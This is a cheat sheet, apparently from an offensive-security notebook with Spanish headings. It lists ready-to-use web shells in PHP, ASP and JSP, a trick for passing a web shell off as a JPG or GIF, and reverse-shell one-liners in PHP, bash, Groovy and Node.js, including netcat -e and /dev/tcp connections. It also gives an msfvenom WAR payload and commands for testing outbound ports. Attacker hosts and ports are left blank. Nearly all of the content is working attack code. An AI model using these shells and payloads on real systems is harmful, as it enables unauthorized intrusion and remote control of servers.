# General ## Web shells ### Kali Linux /usr/share/webshells/ ### PHP * ```php ``` ```php ``` ```php "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; } ?> ``` ### ASP ```aspnet <% eval request("cmd") %> ``` ### JSP ```java <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ``` ### Imágenes ```shell echo -n "\xff\xd8\xff\xe0" > webshell.jpg echo -n "GIF89a;" > webshell.gif exiftool -Comment="" webshell.gif ``` ## Reverse shells ### PHP * * ```bash # /bin/sh php -r '$sock=fsockopen("",);exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("",);shell_exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("",);system("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("",);passthru("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("",);popen("/bin/sh -i <&3 >&3 2>&3", "r");' # /bin/bash php -r "exec(\"bash -c 'bash -i >& /dev/tcp// 0>&1'\");" php -r "shell_exec(\"bash -c 'bash -i >& /dev/tcp// 0>&1'\");" php -r "system(\"bash -c 'bash -i >& /dev/tcp// 0>&1'\");" php -r "passthru(\"bash -c 'bash -i >& /dev/tcp// 0>&1'\");" php -r "popen(\"bash -c 'bash -i >& /dev/tcp// 0>&1'\",\"r\");" ``` ### Apache Tomcat ```shell msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war ``` ### Groovy ```shell String host=""; int port=; String cmd="bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` ### Server-Side Includes (SSI) ``` ``` ### Node.js ```bash # /bin/sh echo "require('child_process').exec('nc -nv

-e /bin/sh')" > /tmp/revshell.js; node /tmp/revshell.js # /bin/bash echo "require('child_process').exec('nc -nv

-e /bin/bash')" > /tmp/revshell.js; node /tmp/revshell.js ``` ```javascript (function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(, "", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /test/; })(); ``` ## Revisión de ejecución de comandos ```shell # Máquina victima ## Linux/Unix ping -c 4 ## Windows ping -n 4 # Máquina atacante sudo tcpdump -i icmp ``` ## Revisión de puertos de salida abiertos ```shell # Wget wget :443 python3 -m http.server 443 # cURL curl http://:443 python3 -m http.server 443 # Bash bash -c 'echo testing > /dev/tcp//443' rlwrap nc -lvnp 443 ```